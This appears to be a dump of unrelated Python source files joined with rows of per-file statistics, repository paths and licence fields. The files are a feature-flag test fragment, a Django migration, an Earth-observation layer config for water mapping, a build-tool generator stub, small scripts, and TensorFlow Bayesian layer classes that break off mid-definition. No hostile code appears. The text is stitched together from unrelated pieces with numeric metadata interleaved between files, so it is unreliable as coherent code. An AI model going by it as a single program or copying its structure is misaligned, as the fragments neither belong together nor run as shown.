self.assertFalse(feat.is_enabled('a'))
self.assertFalse(feat.is_enabled('b'))
self.assertFalse(feat.is_enabled('c'))
def test_is_enabled_enabled(self):
"""Enabled features."""
feat = features.Features(enabled=['a', 'b'])
self.assertTrue(feat.is_enabled('a'))
self.assertTrue(feat.is_enabled('b'))
self.assertTrue(feat.is_enabled('c'))
def test_is_enabled_enabled_with_default_enabled_false(self):
"""Enabled features."""
feat = features.Features(enabled=['a', 'b'], default_enabled=False)
self.assertTrue(feat.is_enabled('a'))
self.assertTrue(feat.is_enabled('b'))
self.assertFalse(feat.is_enabled('c'))
| 38.466667
| 76
| 0.655113
| 347
| 2,885
| 5.224784
| 0.092219
| 0.086045
| 0.100386
| 0.143409
| 0.883067
| 0.869829
| 0.809156
| 0.809156
| 0.783232
| 0.769994
| 0
| 0
| 0.192028
| 2,885
| 74
| 77
| 38.986486
| 0.777778
| 0.087695
| 0
| 0.653061
| 0
| 0
| 0.021004
| 0
| 0
| 0
| 0
| 0
| 0.530612
| 1
| 0.204082
| false
| 0
| 0.040816
| 0
| 0.265306
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f39348d43aa6dcd807e0d936aca45e2ecd9e5f7c
| 139
|
py
|
Python
|
boilerplate/backend/utils/config.py
|
tamuto/boilerplate
|
47950c67e89dc6c7f8b24705c04c6f6061797bb2
|
[
"MIT"
] | null | null | null |
boilerplate/backend/utils/config.py
|
tamuto/boilerplate
|
47950c67e89dc6c7f8b24705c04c6f6061797bb2
|
[
"MIT"
] | null | null | null |
boilerplate/backend/utils/config.py
|
tamuto/boilerplate
|
47950c67e89dc6c7f8b24705c04c6f6061797bb2
|
[
"MIT"
] | null | null | null |
import os
def get_CORS():
return os.environ.get('BACKEND_CORS')
def get_DB_CONN():
return os.environ.get('BACKEND_MYSQL_CONN')
| 13.9
| 47
| 0.71223
| 22
| 139
| 4.227273
| 0.5
| 0.129032
| 0.322581
| 0.387097
| 0.537634
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.158273
| 139
| 9
| 48
| 15.444444
| 0.794872
| 0
| 0
| 0
| 0
| 0
| 0.215827
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| true
| 0
| 0.2
| 0.4
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
342f46a21f91d0879d7c8dea73ba5b13964778b2
| 2,165
|
py
|
Python
|
web/pipeline/migrations/0106_auto_20201023_2249.py
|
stevenstuber/CIT
|
8c485e72084c06da6db45da1cb402bac26411ec2
|
[
"Apache-2.0"
] | 10
|
2020-11-12T15:13:40.000Z
|
2022-03-05T22:33:08.000Z
|
web/pipeline/migrations/0106_auto_20201023_2249.py
|
stevenstuber/CIT
|
8c485e72084c06da6db45da1cb402bac26411ec2
|
[
"Apache-2.0"
] | 28
|
2020-07-17T16:33:55.000Z
|
2022-03-21T16:24:25.000Z
|
web/pipeline/migrations/0106_auto_20201023_2249.py
|
stevenstuber/CIT
|
8c485e72084c06da6db45da1cb402bac26411ec2
|
[
"Apache-2.0"
] | 5
|
2020-11-02T23:39:53.000Z
|
2022-03-01T19:09:45.000Z
|
# Generated by Django 2.2.13 on 2020-10-23 22:49
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('pipeline', '0105_auto_20201023_2112'),
]
operations = [
migrations.AlterField(
model_name='project',
name='clean_energy_ind',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='project',
name='construction_jobs',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='project',
name='estimated_cost',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='project',
name='federal_funding',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='project',
name='green_building_ind',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='project',
name='indigenous_ind',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='project',
name='municipal_funding',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='project',
name='operating_jobs',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='project',
name='other_public_funding',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='project',
name='provinvial_funding',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='project',
name='public_funding_ind',
field=models.IntegerField(blank=True, null=True),
),
]
| 31.376812
| 61
| 0.566744
| 198
| 2,165
| 6.050505
| 0.257576
| 0.183639
| 0.229549
| 0.266277
| 0.774624
| 0.774624
| 0.741235
| 0.741235
| 0.705342
| 0.705342
| 0
| 0.021724
| 0.31963
| 2,165
| 68
| 62
| 31.838235
| 0.791582
| 0.021247
| 0
| 0.709677
| 1
| 0
| 0.136514
| 0.010864
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.016129
| 0
| 0.064516
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
3433f922c84ebb99ebcc50a17af065823b889b56
| 222
|
py
|
Python
|
mlvajra/explanations/globalExp.py
|
rajagurunath/mlvajra
|
abaa40717342cecc785144700884e1c9d5910c43
|
[
"Apache-2.0"
] | 2
|
2019-04-22T12:25:05.000Z
|
2019-05-05T16:49:12.000Z
|
mlvajra/explanations/globalExp.py
|
rajagurunath/mlvajra
|
abaa40717342cecc785144700884e1c9d5910c43
|
[
"Apache-2.0"
] | 9
|
2019-04-06T14:27:22.000Z
|
2021-04-30T20:42:19.000Z
|
mlvajra/explanations/globalExp.py
|
rajagurunath/mlvajra
|
abaa40717342cecc785144700884e1c9d5910c43
|
[
"Apache-2.0"
] | null | null | null |
from sklearn.ensemble.partial_dependence import partial_dependence,plot_partial_dependence
from eli5.sklearn import PermutationImportance
__all__=['PermutationImportance','partial_dependence','plot_partial_dependence']
| 55.5
| 91
| 0.878378
| 23
| 222
| 8
| 0.434783
| 0.461957
| 0.228261
| 0.304348
| 0.413043
| 0
| 0
| 0
| 0
| 0
| 0
| 0.004762
| 0.054054
| 222
| 4
| 92
| 55.5
| 0.871429
| 0
| 0
| 0
| 0
| 0
| 0.281818
| 0.2
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3453eb238bda33f6597f81be1b9336760fa4f2e1
| 15,151
|
py
|
Python
|
services/ows_refactored/wofs/ows_wofsc2_cfg.py
|
eloise-b/config
|
070693cca69c1ee62a1995772668b172da15a4c3
|
[
"Apache-2.0"
] | null | null | null |
services/ows_refactored/wofs/ows_wofsc2_cfg.py
|
eloise-b/config
|
070693cca69c1ee62a1995772668b172da15a4c3
|
[
"Apache-2.0"
] | null | null | null |
services/ows_refactored/wofs/ows_wofsc2_cfg.py
|
eloise-b/config
|
070693cca69c1ee62a1995772668b172da15a4c3
|
[
"Apache-2.0"
] | null | null | null |
from ows_refactored.common.ows_reslim_cfg import reslim_wofs, reslim_wofs_daily
from ows_refactored.wofs.band_wofs_cfg import (bands_wofs_2_annual_summary,
bands_wofs_obs)
from ows_refactored.wofs.style_wofs_cfg import (
style_wofs_annual_summary_frequency,
style_wofs_annual_summary_frequency_blue, style_wofs_beta_summary_clear,
style_wofs_count_wet, style_wofs_frequency, style_wofs_frequency_blue,
style_wofs_obs, style_wofs_obs_wet_only, style_wofs_summary_clear,
style_wofs_water_annual_wet)
layers = {
"title": "Water Observations from Space (Beta)",
"abstract": """WOfS""",
"layers": [
{
"title": "Water Observations from Space Feature Layer (Beta)",
"name": "ga_ls8c_wofs_2",
"abstract": """
Water Observations from Space (WOfS) provides surface water observations derived from satellite imagery for all of Africa. The WOfS product allows users to get a better understanding of where water is normally present in a landscape, where water is seldom observed, and where inundation has occurred occasionally. Data is provided as Water Observation Feature Layers (WOFLs), in a 1 to 1 relationship with the input satellite data. Hence there is one WOFL for each satellite dataset processed for the occurrence of water.
This product has a spatial resolution of 30 m and a temporal coverage of 2013 to 2019.
It is derived from Landsat 8 satellite observations as part of a provisional Landsat Collection 2 surface reflectance product.
Daily water observations can be used to map historical flood and to understand surface water dynamics.
WOfS shows surface water on the day and time that satellite passed overhead, which might be before, during or after a flood peak. Given the time between satellite passes (approximately once every 16 days) it is unlikely that the satellite will capture the maximum extent of any given flood. Instead, it aims to provide large scale, regional information on surface water.
For more information on the algorithm, see https://doi.org/10.1016/j.rse.2015.11.003
This product is accessible through OGC Web Service (https://ows.digitalearth.africa/), for analysis in DE Africa Sandbox JupyterLab (https://github.com/digitalearthafrica/deafrica-sandbox-notebooks/wiki) and for direct download from AWS S3 (https://data.digitalearth.africa/).
""",
"product_name": "ga_ls8c_wofs_2",
"bands": bands_wofs_obs,
"resource_limits": reslim_wofs_daily,
"image_processing": {
"extent_mask_func": "datacube_ows.ogc_utils.mask_by_bitflag",
"always_fetch_bands": [],
"manual_merge": False,
},
"wcs": {
"native_crs": "EPSG:4326",
"native_resolution": [30.0, -30.0],
"default_bands": ["water"],
},
"styling": {
"default_style": "observations",
"styles": [
style_wofs_obs,
style_wofs_obs_wet_only,
],
},
},
{
"title": "Water Observations from Space Annual Summary (Beta)",
"name": "wofs_2_annual_summary_frequency",
"abstract": """
Annual water summary is one of the statistical summaries of the Water Observation from Space (WOfS) product that shows what percentage of clear observations were detected as wet (ie. the ration of wet to clear as a percentage) from each calendar year.
This product has a spatial resolution of 30 m and a temporal coverage of 2013 to 2019.
It is derived from Landsat 8 satellite observations as part of a provisional Landsat Collection 2 surface reflectance product.
The annual summaries can be used to understand year to year changes in surface water extent.
WOfS shows surface water on the day and time that satellite passed overhead, which might be before, during or after a flood peak. Given the time between satellite passes (approximately once every 16 days) it is unlikely that the satellite will capture the maximum extent of any given flood. Instead, it aims to provide large scale, regional information on surface water.
For more information on the algorithm, see https://doi.org/10.1016/j.rse.2015.11.003
This product is accessible through OGC Web Service (https://ows.digitalearth.africa/), for analysis in DE Africa Sandbox JupyterLab (https://github.com/digitalearthafrica/deafrica-sandbox-notebooks/wiki) and for direct download from AWS S3 (https://data.digitalearth.africa/).
""",
"product_name": "ga_ls8c_wofs_2_annual_summary",
"time_resolution": "year",
"bands": bands_wofs_2_annual_summary,
"resource_limits": reslim_wofs,
"image_processing": {
"extent_mask_func": "datacube_ows.ogc_utils.mask_by_val",
"always_fetch_bands": [],
"manual_merge": False,
},
"wcs": {
"native_crs": "EPSG:6933",
"native_resolution": [30.0, -30.0],
"default_bands": ["frequency"],
},
"styling": {
"default_style": "WOfS_frequency",
"styles": [
style_wofs_annual_summary_frequency,
style_wofs_annual_summary_frequency_blue,
],
},
},
{
"title": "Water Observations from Space Annual Count of Wet Observations (Beta)",
"name": "wofs_2_annual_summary_wet",
"abstract": """
The count of wet observations is one of the statistical summaries of the Water Observation from Space (WOfS) product that shows how many times water was detected in observations that were clear. This product was used as a source layer for calculating annual water summary.
This product has a spatial resolution of 30 m and a temporal coverage of 2013 to 2019.
It is derived from Landsat 8 satellite observations as part of a provisional Landsat Collection 2 surface reflectance product.
For more information on the algorithm, see https://doi.org/10.1016/j.rse.2015.11.003
This product is accessible through OGC Web Service (https://ows.digitalearth.africa/), for analysis in DE Africa Sandbox JupyterLab (https://github.com/digitalearthafrica/deafrica-sandbox-notebooks/wiki) and for direct download from AWS S3 (https://data.digitalearth.africa/).
""",
"product_name": "ga_ls8c_wofs_2_annual_summary",
"time_resolution": "year",
"bands": bands_wofs_2_annual_summary,
"resource_limits": reslim_wofs,
"image_processing": {
"extent_mask_func": "datacube_ows.ogc_utils.mask_by_val",
"always_fetch_bands": [],
"manual_merge": False,
},
"wcs": {
"native_crs": "EPSG:6933",
"native_resolution": [30.0, -30.0],
"default_bands": ["count_wet"],
},
"styling": {
"default_style": "water_observations",
"styles": [
style_wofs_water_annual_wet,
],
},
},
{
"title": "Water Observations from Space Annual Count of Clear Observations (Beta)",
"name": "wofs_2_annual_summary_clear",
"abstract": """
The count of clear observations is one of the statistical summaries of the Water Observations from Space (WOfS) product that shows how many times an area could be clearly seen (I.e. not affected by clouds, shadows or other satellite observation problems). This product was used as a source layer for calculating annual water summary.
This product has a spatial resolution of 30 m and a temporal coverage of 2013 to 2019.
It is derived from Landsat 8 satellite observations as part of a provisional Landsat Collection 2 surface reflectance product.
For more information on the algorithm, see https://doi.org/10.1016/j.rse.2015.11.003
This product is accessible through OGC Web Service (https://ows.digitalearth.africa/), for analysis in DE Africa Sandbox JupyterLab (https://github.com/digitalearthafrica/deafrica-sandbox-notebooks/wiki) and for direct download from AWS S3 (https://data.digitalearth.africa/).
""",
"product_name": "ga_ls8c_wofs_2_annual_summary",
"time_resolution": "year",
"bands": bands_wofs_2_annual_summary,
"resource_limits": reslim_wofs,
"image_processing": {
"extent_mask_func": "datacube_ows.ogc_utils.mask_by_val",
"always_fetch_bands": [],
"manual_merge": False,
},
"wcs": {
"native_crs": "EPSG:6933",
"native_resolution": [30.0, -30.0],
"default_bands": ["count_clear"],
},
"styling": {
"default_style": "annual_clear_observations",
"styles": [
style_wofs_beta_summary_clear,
],
},
},
{
"title": "Water Observations from Space All Time Summary (Beta)",
"name": "wofs_2_summary_frequency",
"abstract": """
All time water summary is one of the statistical summaries of the Water Observation from Space (WOfS) product that shows what percentage of clear observations were detected as wet (ie. the ration of wet to clear as a percentage) over time.
This product has a spatial resolution of 30 m and a temporal coverage of 2013 to 2019.
It is derived from Landsat 8 satellite observations as part of a provisional Landsat Collection 2 surface reflectance product.
All time water summary can be used to understand water availability and flooding risk in a historical context.
WOfS shows surface water on the day and time that satellite passed overhead, which might be before, during or after a flood peak. Given the time between satellite passes (approximately once every 16 days) it is unlikely that the satellite will capture the maximum extent of any given flood. Instead, it aims to provide large scale, regional information on surface water.
For more information on the algorithm, see https://doi.org/10.1016/j.rse.2015.11.003
This product is accessible through OGC Web Service (https://ows.digitalearth.africa/), for analysis in DE Africa Sandbox JupyterLab (https://github.com/digitalearthafrica/deafrica-sandbox-notebooks/wiki) and for direct download from AWS S3 (https://data.digitalearth.africa/).
""",
"product_name": "ga_ls8c_wofs_2_summary",
"bands": bands_wofs_2_annual_summary,
"time_resolution": "year",
"resource_limits": reslim_wofs,
"image_processing": {
"extent_mask_func": "datacube_ows.ogc_utils.mask_by_val",
"always_fetch_bands": [],
"manual_merge": False,
},
"wcs": {
"native_crs": "EPSG:6933",
"native_resolution": [30.0, -30.0],
"default_bands": ["frequency"],
},
"styling": {
"default_style": "WOfS_frequency",
"styles": [
style_wofs_frequency,
style_wofs_frequency_blue,
],
},
},
{
"title": "Water Observations from Space All Time Count of Wet Observations (Beta)",
"name": "wofs_2_summary_wet",
"abstract": """
The count of wet observations is one of the statistical summaries of the Water Observation from Space (WOfS) product that shows how many times water was detected in observations that were clear. This product was used as a source layer for calculating all time water summary.
This product has a spatial resolution of 30 m and a temporal coverage of 2013 to 2019.
It is derived from Landsat 8 satellite observations as part of a provisional Landsat Collection 2 surface reflectance product.
For more information on the algorithm, see https://doi.org/10.1016/j.rse.2015.11.003
This product is accessible through OGC Web Service (https://ows.digitalearth.africa/), for analysis in DE Africa Sandbox JupyterLab (https://github.com/digitalearthafrica/deafrica-sandbox-notebooks/wiki) and for direct download from AWS S3 (https://data.digitalearth.africa/).
""",
"product_name": "ga_ls8c_wofs_2_summary",
"time_resolution": "year",
"bands": bands_wofs_2_annual_summary,
"resource_limits": reslim_wofs,
"image_processing": {
"extent_mask_func": "datacube_ows.ogc_utils.mask_by_val",
"always_fetch_bands": [],
"manual_merge": False,
},
"wcs": {
"native_crs": "EPSG:6933",
"native_resolution": [30.0, -30.0],
"default_bands": ["count_wet"],
},
"styling": {
"default_style": "water_observations",
"styles": [
style_wofs_count_wet,
],
},
},
{
"title": "Water Observations from Space All Time Count of Clear Observations (Beta)",
"name": "wofs_2_summary_clear",
"abstract": """
The count of clear observations is one of the statistical summaries of the Water Observations from Space (WOfS) product that shows how many times an area could be clearly seen (I.e. not affected by clouds, shadows or other satellite observation problems). This product was used as a source layer for calculating all time water summary.
This product has a spatial resolution of 30 m and a temporal coverage of 2013 to 2019.
It is derived from Landsat 8 satellite observations as part of a provisional Landsat Collection 2 surface reflectance product.
For more information on the algorithm, see https://doi.org/10.1016/j.rse.2015.11.003
This product is accessible through OGC Web Service (https://ows.digitalearth.africa/), for analysis in DE Africa Sandbox JupyterLab (https://github.com/digitalearthafrica/deafrica-sandbox-notebooks/wiki) and for direct download from AWS S3 (https://data.digitalearth.africa/).
""",
"product_name": "ga_ls8c_wofs_2_summary",
"bands": bands_wofs_2_annual_summary,
"resource_limits": reslim_wofs,
"time_resolution": "year",
"image_processing": {
"extent_mask_func": "datacube_ows.ogc_utils.mask_by_val",
"always_fetch_bands": [],
"manual_merge": False,
},
"wcs": {
"native_crs": "EPSG:6933",
"native_resolution": [30.0, -30.0],
"default_bands": ["count_clear"],
},
"styling": {
"default_style": "annual_clear_observations",
"styles": [
style_wofs_summary_clear,
],
},
},
],
}
| 54.894928
| 521
| 0.65131
| 1,897
| 15,151
| 5.041645
| 0.12388
| 0.021644
| 0.014952
| 0.024467
| 0.8899
| 0.867001
| 0.852049
| 0.837516
| 0.806148
| 0.796738
| 0
| 0.027199
| 0.264735
| 15,151
| 275
| 522
| 55.094545
| 0.831329
| 0
| 0
| 0.633333
| 0
| 0.1
| 0.687479
| 0.036433
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.0125
| 0.0125
| 0
| 0.0125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
346452b1f32b0e435c3ba8f0b446f34b1ea64fc3
| 229
|
py
|
Python
|
conftest.py
|
luismayta/python-example-elasticsearch
|
4572b03c425f525094d5892ef8c625cfa991174a
|
[
"MIT"
] | 4
|
2019-08-04T19:23:39.000Z
|
2021-04-10T08:26:44.000Z
|
conftest.py
|
luismayta/python-example-elasticsearch
|
4572b03c425f525094d5892ef8c625cfa991174a
|
[
"MIT"
] | 3
|
2019-07-08T20:08:02.000Z
|
2019-07-09T19:47:25.000Z
|
conftest.py
|
luismayta/python-example-elasticsearch
|
4572b03c425f525094d5892ef8c625cfa991174a
|
[
"MIT"
] | 1
|
2019-08-05T05:15:26.000Z
|
2019-08-05T05:15:26.000Z
|
# -*- coding: utf-8 -*-
from blog.fixtures.core import * # noqa pylint: disable=W0614,W0401
from blog.fixtures.db import * # noqa pylint: disable=W0614,W0401
from blog.fixtures.data import * # noqa pylint: disable=W0614,W0401
| 45.8
| 68
| 0.729258
| 33
| 229
| 5.060606
| 0.454545
| 0.143713
| 0.287425
| 0.413174
| 0.784431
| 0.784431
| 0.586826
| 0.586826
| 0.586826
| 0
| 0
| 0.126904
| 0.139738
| 229
| 4
| 69
| 57.25
| 0.720812
| 0.524017
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3482dac3dbdc133ff9f9ccf502e6d022786c5508
| 268
|
py
|
Python
|
cekit/generator/behave.py
|
nalind/cekit
|
f54345bb2c0f38c19adb7b8afa9272b9264591a9
|
[
"MIT"
] | 1
|
2018-01-17T16:11:57.000Z
|
2018-01-17T16:11:57.000Z
|
cekit/generator/behave.py
|
nalind/cekit
|
f54345bb2c0f38c19adb7b8afa9272b9264591a9
|
[
"MIT"
] | 39
|
2017-12-12T09:32:33.000Z
|
2018-02-27T16:04:48.000Z
|
cekit/generator/behave.py
|
nalind/cekit
|
f54345bb2c0f38c19adb7b8afa9272b9264591a9
|
[
"MIT"
] | 2
|
2017-12-14T17:10:47.000Z
|
2018-01-08T19:16:21.000Z
|
from cekit.generator.base import Generator
class BehaveGenerator(Generator):
def __init__(self, descriptor_path, target, overrides):
super(BehaveGenerator, self).__init__(descriptor_path, target, overrides)
def prepare_artifacts(self):
pass
| 26.8
| 81
| 0.75
| 29
| 268
| 6.551724
| 0.62069
| 0.147368
| 0.210526
| 0.305263
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.16791
| 268
| 9
| 82
| 29.777778
| 0.852018
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0.166667
| 0.166667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
caac437b6e003093294629c1fe986cff030f822c
| 114
|
py
|
Python
|
more_autograding_examples/python_multipart_static_analysis/submissions/p3_bug.py
|
elihschiff/Submitty
|
8b980997b6f1dfcd73eb4cf4cca43398e67f96dc
|
[
"BSD-3-Clause"
] | 411
|
2016-06-14T20:52:25.000Z
|
2022-03-31T21:20:25.000Z
|
more_autograding_examples/python_multipart_static_analysis/submissions/p3_bug.py
|
KaelanWillauer/Submitty
|
cf9b6ceda15ec0a661e2ca81ea7864790094c64a
|
[
"BSD-3-Clause"
] | 5,730
|
2016-05-23T21:04:32.000Z
|
2022-03-31T10:08:06.000Z
|
more_autograding_examples/python_multipart_static_analysis/submissions/p3_bug.py
|
KaelanWillauer/Submitty
|
cf9b6ceda15ec0a661e2ca81ea7864790094c64a
|
[
"BSD-3-Clause"
] | 423
|
2016-09-22T21:11:30.000Z
|
2022-03-29T18:55:28.000Z
|
volume = 5 * 16.5 * 12.5
area = 2*5*16.5 + 2*5*12.5 + 2*16.5*12.5
print('volume =', volume)
print('area =', area)
| 22.8
| 40
| 0.561404
| 26
| 114
| 2.461538
| 0.269231
| 0.140625
| 0.1875
| 0.1875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.255319
| 0.175439
| 114
| 4
| 41
| 28.5
| 0.425532
| 0
| 0
| 0
| 0
| 0
| 0.122807
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
cac51a734134771bbd81451317dd47c25ee845b1
| 179
|
py
|
Python
|
helloFunc.py
|
treva-123mutebi/Simple-Python-Programs
|
e9c89248a30deaf6f06db0c280aae8363b682317
|
[
"Unlicense"
] | null | null | null |
helloFunc.py
|
treva-123mutebi/Simple-Python-Programs
|
e9c89248a30deaf6f06db0c280aae8363b682317
|
[
"Unlicense"
] | null | null | null |
helloFunc.py
|
treva-123mutebi/Simple-Python-Programs
|
e9c89248a30deaf6f06db0c280aae8363b682317
|
[
"Unlicense"
] | null | null | null |
def hello(): ##defines the function
print('Howdy!') ##body of the function
print('Howdy!!!')
print('Hello there.')
hello() ##function calls
hello()
hello()
| 17.9
| 43
| 0.592179
| 21
| 179
| 5.047619
| 0.52381
| 0.207547
| 0.301887
| 0.396226
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.22905
| 179
| 9
| 44
| 19.888889
| 0.768116
| 0.301676
| 0
| 0.428571
| 0
| 0
| 0.236364
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| true
| 0
| 0
| 0
| 0.142857
| 0.428571
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
cadd065f9587460f22de60d61a904fffcf333abd
| 16,585
|
py
|
Python
|
src/model/layers.py
|
divyam3897/ANP_VS
|
237dc06e1170394bdcc3bd7467cc0355232eaa6c
|
[
"MIT"
] | 19
|
2020-06-30T15:46:07.000Z
|
2022-02-28T03:29:55.000Z
|
src/model/layers.py
|
divyam3897/ANP_VS
|
237dc06e1170394bdcc3bd7467cc0355232eaa6c
|
[
"MIT"
] | 2
|
2020-07-04T10:56:05.000Z
|
2020-07-04T10:56:36.000Z
|
src/model/layers.py
|
divyam3897/ANP_VS
|
237dc06e1170394bdcc3bd7467cc0355232eaa6c
|
[
"MIT"
] | 1
|
2021-07-20T12:59:50.000Z
|
2021-07-20T12:59:50.000Z
|
import tensorflow as tf
import numpy as np
import math
exp = tf.exp
log = lambda x: tf.log(x + 1e-20)
logit = lambda x: log(x) - log(1 - x)
softplus = tf.nn.softplus
softmax = tf.nn.softmax
tanh = tf.nn.tanh
relu = tf.nn.relu
sigmoid = tf.nn.sigmoid
flatten = tf.layers.flatten
class Dense(object):
def __init__(self, n_in, n_out, name='dense', reuse=None):
with tf.variable_scope(name, reuse=reuse):
self.W = tf.get_variable('W', shape=[n_in, n_out])
self.b = tf.get_variable('b', shape=[n_out])
def __call__(self, x, activation=None, in_mask=None, out_mask=None):
W = self.W if in_mask is None else \
tf.gather(self.W, in_mask, axis=0)
W = W if out_mask is None else \
tf.gather(W, out_mask, axis=1)
b = self.b if out_mask is None else tf.gather(self.b, out_mask)
x = tf.matmul(x, W) + b
x = x if activation is None else activation(x)
return x
def params(self, trainable=None):
return [self.W, self.b]
class DenseBayes(object):
def __init__(self,
sigma_prior,
n_in,
n_out,
init_rho=None,
name='dense_bayes',
reuse=None):
self.sigma_prior = sigma_prior
limit = 1.0 / math.sqrt(n_in)
with tf.variable_scope(name, reuse=reuse):
self.mu_w = tf.get_variable('mu_w',
shape=[n_in, n_out],
initializer=tf.initializers.random_uniform(
-limit, limit),
dtype=tf.float32)
self.mu_b = tf.get_variable('mu_b',
shape=[n_out],
initializer=tf.initializers.random_uniform(
-limit, limit),
dtype=tf.float32)
self.epsilon_w = tf.random.normal(shape=[n_in, n_out], mean=0., stddev=1.)
self.epsilon_b = tf.random.normal(shape=[n_out], mean=0., stddev=1.)
if init_rho is None:
self.rho_w = tf.get_variable('rho_w',
shape=[n_in, n_out],
dtype=tf.float32)
self.rho_b = tf.get_variable('rho_b', shape=[n_out], dtype=tf.float32)
else:
self.rho_w = tf.get_variable(
'rho_w',
shape=[n_in, n_out],
initializer=tf.constant_initializer(value=init_rho),
dtype=tf.float32)
self.rho_b = tf.get_variable(
'rho_b',
shape=[n_out],
initializer=tf.constant_initializer(value=init_rho),
dtype=tf.float32)
self.sigma_w = softplus(self.rho_w)
self.sigma_b = softplus(self.rho_b)
def __call__(self, x, train, activation=None, in_mask=None, out_mask=None):
if train:
self.W = self.mu_w + tf.multiply(self.sigma_w, self.epsilon_w)
self.b = self.mu_b + tf.multiply(self.sigma_b, self.epsilon_b)
else:
self.W = self.mu_w
self.b = self.mu_b
W = self.W if in_mask is None else \
tf.gather(self.W, in_mask, axis=2)
W = W if out_mask is None else \
tf.gather(self.b, out_mask, axis=3)
b = self.b if out_mask is None else \
tf.gather(self.b, out_mask)
x = tf.matmul(x, W) + b
x = x if activation is None else activation(x)
return x
def kl(self):
kl_W = log(tf.divide(self.sigma_prior, self.sigma_w)) + (tf.square(self.sigma_w) + \
tf.square(self.mu_w)) / (2 * tf.square(self.sigma_prior)) - 0.5
kl_b = log(tf.divide(
self.sigma_prior, self.sigma_b)) + (tf.square(self.sigma_b) + tf.square(
self.mu_b)) / (2 * tf.square(self.sigma_prior)) - 0.5
kl = tf.reduce_sum(kl_W) + tf.reduce_sum(kl_b)
return kl
def params(self, trainable=None):
return [self.mu_w, self.rho_w, self.mu_b, self.rho_b]
class Conv(object):
def __init__(self,
n_in,
n_out,
kernel_size,
strides=1,
padding='VALID',
name='conv',
reuse=None):
with tf.variable_scope(name, reuse=reuse):
self.W = tf.get_variable('W',
shape=[kernel_size, kernel_size, n_in, n_out])
self.b = tf.get_variable('b', shape=[n_out])
self.strides = 1
self.padding = padding
